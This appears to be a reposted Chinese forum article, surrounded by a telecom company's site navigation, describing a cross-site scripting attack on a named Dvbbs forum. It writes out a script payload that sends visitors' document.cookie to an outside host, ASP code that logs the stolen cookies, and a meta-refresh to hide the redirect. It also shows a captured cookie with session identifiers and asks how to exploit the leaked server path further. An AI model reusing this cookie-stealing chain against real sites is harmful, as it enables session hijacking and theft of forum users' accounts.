• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    关于动网的cookie泻露站点绝路径的问题
    一、跨站测试
    先看看我的一次跨站测试吧
    我以职业欠钱的站点做测试吧:
    Host:zhiyeqianqian.51web.cn
    My Test:
    先在他的论谈上传两张图,
    图一的内容是:
    script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie/script>
    得到url为UploadFile/2005-6/200562716565777847.jpg
    图二则是偶的个人照
    UploadFile/2005-6/200562716563048909.jpg
    写个盗cookie的代码到我的空间,lcx的盗cookie代码有问题,所以修改了一下。
    %
    cookiefile=Server.MapPath("cookie.txt")
    set fs=server.CreateObject("scripting.filesystemobject")
    set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
    cookiefile.Write(Request.QueryString"br>")
    cookiefile.close
    set fs = nothing
    %>
    META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">
    接下来,点击图一,自动转到图二,

    二、结果分析
    再到我的空间看一下,抓到cookie如下:
    msg=ewwwrootzhiyeqianqianwwwroot=UserID=218usercookies=1StatUserID=2190418138password=想要吗?嘿嘿userhidden=2userclass=%D0%C2%CA%D6%C9%CF%C2%B7username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIMbr>
    分析cookie我们不难看出他的绝对路径是e:\wwwroot\zhiyeqianqian\wwwroot


    三、论谈
    本来,最初的测试我是在测试BCT论谈,成功暴出他的绝对路径,一开始的时候,我还认为可能又是动网出洞洞了,所以又去测试了其它几个站,测试结果是其它的站点并没有暴出路径,今天再次测试“欠我钱”的论谈,却又暴不出来,查了一下代码,和别人的代码一个样,根本没什么差别。
    偶想听听大家的看法,到底是哪里出了问题,能不能深入利用~~~
    上一篇:如何利用HTML格式化你的硬盘
    下一篇:网页打开后自动执行木马
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    关于动网的cookie泻露站点绝路径的问题 关于,动网,的,cookie,泻露,